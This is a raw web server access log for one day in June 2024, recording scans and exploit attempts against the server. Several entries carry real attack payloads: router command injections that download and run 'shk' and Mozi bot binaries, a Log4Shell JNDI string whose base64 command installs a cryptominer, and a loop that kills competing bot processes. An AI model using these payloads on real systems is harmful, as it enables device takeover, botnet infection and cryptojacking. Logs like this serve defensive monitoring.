45.148.10.174 - - [27/Jun/2024:00:08:08 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [27/Jun/2024:00:08:08 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 141.98.83.197 - - [27/Jun/2024:00:15:51 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [27/Jun/2024:00:15:51 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 87.121.69.27 - - [27/Jun/2024:00:16:01 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 194.59.31.99 - - [27/Jun/2024:00:30:28 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 45.128.232.200 - - [27/Jun/2024:00:35:53 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 45.128.232.110 - - [27/Jun/2024:00:38:18 +0200] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 804 178.62.212.83 - - [27/Jun/2024:01:16:24 +0200] "-" 400 1930 178.62.212.83 - - [27/Jun/2024:01:16:24 +0200] "-" 400 1930 178.62.212.83 - - [27/Jun/2024:01:16:24 +0200] "GET / HTTP/1.1" 200 1895 178.62.212.83 - - [27/Jun/2024:01:16:24 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 172.169.111.89 - - [27/Jun/2024:01:36:10 +0200] "-" 400 1930 141.98.11.15 - - [27/Jun/2024:01:36:37 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 81.209.179.150 - - [27/Jun/2024:01:43:10 +0200] "-" 400 1930 81.209.179.150 - - [27/Jun/2024:01:43:10 +0200] "GET / HTTP/1.1" 200 1895 81.209.179.150 - - [27/Jun/2024:01:43:12 +0200] "GET /favicon.ico HTTP/1.1" 404 729 172.202.177.134 - - [27/Jun/2024:02:26:50 +0200] "GET /hudson HTTP/1.1" 404 724 89.190.215.52 - - [27/Jun/2024:02:49:58 +0200] "GET / HTTP/1.1" 200 1895 149.50.103.48 - - [27/Jun/2024:03:40:08 +0200] "GET / HTTP/1.1" 200 1895 4.255.101.7 - - [27/Jun/2024:04:19:08 +0200] "GET / HTTP/1.1" 200 1895 64.62.197.191 - - [27/Jun/2024:04:40:58 +0200] "GET / HTTP/1.1" 200 1895 64.62.197.194 - - [27/Jun/2024:04:41:30 +0200] "GET /favicon.ico HTTP/1.1" 404 729 64.62.197.190 - - [27/Jun/2024:04:41:44 +0200] "GET /?format=json HTTP/1.1" 200 1895 64.62.197.192 - - [27/Jun/2024:04:41:57 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 205.210.31.51 - - [27/Jun/2024:05:13:55 +0200] "GET / HTTP/1.0" 200 1895 149.50.103.48 - - [27/Jun/2024:06:03:52 +0200] "GET / HTTP/1.1" 200 1895 58.176.52.254 - - [27/Jun/2024:06:08:17 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 194.169.175.53 - - [27/Jun/2024:06:15:09 +0200] "-" 400 1930 45.148.10.174 - - [27/Jun/2024:06:17:35 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [27/Jun/2024:06:17:35 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 87.121.69.27 - - [27/Jun/2024:06:27:46 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 66.249.66.162 - - [27/Jun/2024:06:51:45 +0200] "GET /docs/ HTTP/1.1" 404 727 147.185.132.204 - - [27/Jun/2024:06:56:14 +0200] "-" 400 1930 147.185.132.204 - - [27/Jun/2024:06:56:14 +0200] "-" 400 1930 149.50.103.48 - - [27/Jun/2024:07:06:15 +0200] "GET / HTTP/1.1" 200 1895 188.157.190.75 - - [27/Jun/2024:07:12:37 +0200] "GET / HTTP/1.0" 200 1895 141.98.11.15 - - [27/Jun/2024:07:19:59 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 87.121.69.27 - - [27/Jun/2024:07:29:54 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 151.235.193.66 - - [27/Jun/2024:07:32:22 +0200] "GET / HTTP/1.1" 200 1895 194.169.175.53 - - [27/Jun/2024:07:44:22 +0200] "-" 400 1930 45.128.232.152 - - [27/Jun/2024:07:56:18 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 45.128.232.152 - - [27/Jun/2024:07:56:18 +0200] "-" 400 1930 45.128.232.152 - - [27/Jun/2024:07:56:18 +0200] "-" 400 1930 45.128.232.152 - - [27/Jun/2024:07:56:18 +0200] "-" 400 1930 141.98.83.197 - - [27/Jun/2024:08:01:50 +0200] "POST /cgi-bin/skk_set.cgi HTTP/1.1" 404 741 66.249.66.161 - - [27/Jun/2024:08:23:45 +0200] "GET /examples/ HTTP/1.1" 404 731 149.50.103.48 - - [27/Jun/2024:08:38:44 +0200] "GET / HTTP/1.1" 200 1895 95.214.55.144 - - [27/Jun/2024:08:49:09 +0200] "GET /t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//95.214.55.202:3306/TomcatBypass/Command/Base64/a2lsbGFsbCAtOSBwYXJhaXNvLng4Njsga2lsbGFsbCAtOSB4bXJpZzsgY3VybCAtcyAtTCBodHRwOi8vZG93bmxvYWQuYzNwb29sLm9yZy94bXJpZ19zZXR1cC9yYXcvbWFzdGVyL3NldHVwX2MzcG9vbF9taW5lci5zaCB8IExDX0FMTD1lbl9VUy5VVEYtOCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO%7D%27) HTTP/1.1" 404 1213 34.79.162.186 - - [27/Jun/2024:09:19:07 +0200] "GET / HTTP/1.1" 200 1895 112.46.212.47 - - [27/Jun/2024:09:28:22 +0200] "GET / HTTP/1.1" 400 771 64.62.197.50 - - [27/Jun/2024:09:37:32 +0200] "-" 400 1930 149.50.103.48 - - [27/Jun/2024:09:57:39 +0200] "GET / HTTP/1.1" 200 1895 170.64.230.76 - - [27/Jun/2024:10:04:06 +0200] "-" 400 1930 170.64.230.76 - - [27/Jun/2024:10:04:07 +0200] "-" 400 1930 170.64.230.76 - - [27/Jun/2024:10:04:07 +0200] "GET / HTTP/1.1" 200 1895 170.64.230.76 - - [27/Jun/2024:10:04:08 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 13.64.111.22 - - [27/Jun/2024:10:10:54 +0200] "GET /actuator/health HTTP/1.1" 404 737 206.168.32.105 - - [27/Jun/2024:10:45:30 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.105 - - [27/Jun/2024:10:45:34 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.105 - - [27/Jun/2024:10:45:34 +0200] "GET /favicon.ico HTTP/1.1" 404 729 185.191.126.213 - - [27/Jun/2024:10:50:59 +0200] "GET / HTTP/1.1" 200 1895 45.156.129.48 - - [27/Jun/2024:11:02:09 +0200] "GET /js/NewWindow_2_all.js HTTP/1.1" 404 743 212.102.57.145 - - [27/Jun/2024:11:30:23 +0200] "CONNECT karlshochschule.de:443 HTTP/1.1" 400 804 149.50.103.48 - - [27/Jun/2024:11:43:43 +0200] "GET / HTTP/1.1" 200 1895 59.178.220.245 - - [27/Jun/2024:12:02:16 +0200] "GET / HTTP/1.1" 200 1895 112.46.214.189 - - [27/Jun/2024:12:04:38 +0200] "GET / HTTP/1.1" 400 771 45.148.10.174 - - [27/Jun/2024:12:16:30 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [27/Jun/2024:12:16:30 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 87.121.69.27 - - [27/Jun/2024:13:02:09 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 78.108.177.50 - - [27/Jun/2024:13:28:37 +0200] "GET / HTTP/1.0" 200 1895 149.50.103.48 - - [27/Jun/2024:13:29:01 +0200] "GET / HTTP/1.1" 200 1895 141.98.11.15 - - [27/Jun/2024:13:46:58 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 87.121.69.27 - - [27/Jun/2024:13:50:15 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 87.236.176.88 - - [27/Jun/2024:14:14:51 +0200] "GET / HTTP/1.1" 200 1895 51.159.211.54 - - [27/Jun/2024:14:24:59 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 94.156.64.113 - - [27/Jun/2024:14:34:11 +0200] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 804 182.121.18.159 - - [27/Jun/2024:14:39:42 +0200] "GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://182.121.18.159:33138/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron HTTP/1.0" 404 727 149.50.103.48 - - [27/Jun/2024:15:12:42 +0200] "GET / HTTP/1.1" 200 1895 45.88.91.41 - - [27/Jun/2024:15:13:54 +0200] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 804 141.98.83.197 - - [27/Jun/2024:15:16:17 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [27/Jun/2024:15:16:17 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 149.50.103.48 - - [27/Jun/2024:15:20:13 +0200] "GET / HTTP/1.1" 200 1895 80.82.78.39 - - [27/Jun/2024:15:33:51 +0200] "GET / HTTP/1.1" 200 1895 80.82.78.39 - - [27/Jun/2024:15:33:54 +0200] "-" 400 1930 51.159.211.54 - - [27/Jun/2024:15:44:01 +0200] "CONNECT paypal.com:443 HTTP/1.1" 400 804 149.50.103.48 - - [27/Jun/2024:16:49:50 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [27/Jun/2024:17:06:58 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 149.50.103.48 - - [27/Jun/2024:17:17:43 +0200] "GET / HTTP/1.1" 200 1895 51.159.211.54 - - [27/Jun/2024:17:25:11 +0200] "CONNECT speedtest.net:443 HTTP/1.1" 400 804 206.168.32.96 - - [27/Jun/2024:18:06:58 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.96 - - [27/Jun/2024:18:07:01 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.96 - - [27/Jun/2024:18:07:02 +0200] "GET /favicon.ico HTTP/1.1" 404 729 64.226.125.152 - - [27/Jun/2024:18:25:06 +0200] "-" 400 1930 64.226.125.152 - - [27/Jun/2024:18:25:06 +0200] "-" 400 1930 64.226.125.152 - - [27/Jun/2024:18:25:06 +0200] "GET / HTTP/1.1" 200 1895 64.226.125.152 - - [27/Jun/2024:18:25:06 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 87.121.69.27 - - [27/Jun/2024:18:34:36 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 149.50.103.48 - - [27/Jun/2024:19:24:27 +0200] "GET / HTTP/1.1" 200 1895 149.50.103.48 - - [27/Jun/2024:19:47:18 +0200] "GET / HTTP/1.1" 200 1895 141.98.11.15 - - [27/Jun/2024:19:55:12 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 87.121.69.27 - - [27/Jun/2024:19:57:16 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 205.210.31.239 - - [27/Jun/2024:20:16:42 +0200] "GET / HTTP/1.0" 200 1895 104.168.70.165 - - [27/Jun/2024:20:41:08 +0200] "GET / HTTP/1.1" 200 1895 141.98.83.197 - - [27/Jun/2024:20:50:15 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [27/Jun/2024:20:50:15 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 103.101.100.163 - - [27/Jun/2024:20:56:46 +0200] "GET / HTTP/1.1" 200 1895 51.159.211.54 - - [27/Jun/2024:21:11:48 +0200] "CONNECT paypal.com:443 HTTP/1.1" 400 804 194.59.31.99 - - [27/Jun/2024:21:30:20 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 172.104.11.46 - - [27/Jun/2024:21:34:01 +0200] "-" 400 1930 149.50.103.48 - - [27/Jun/2024:21:45:42 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [27/Jun/2024:22:15:30 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 51.159.211.54 - - [27/Jun/2024:22:16:03 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.79.172.21 - - [27/Jun/2024:22:39:37 +0200] "GET / HTTP/1.1" 200 1895 117.208.29.55 - - [27/Jun/2024:23:07:25 +0200] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 740 117.208.29.55 - - [27/Jun/2024:23:07:25 +0200] "-" 400 1930 141.98.83.197 - - [27/Jun/2024:23:25:12 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [27/Jun/2024:23:25:12 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 194.59.31.99 - - [27/Jun/2024:23:36:31 +0200] "CONNECT api6.ipify.org:443 HTTP/1.1" 400 804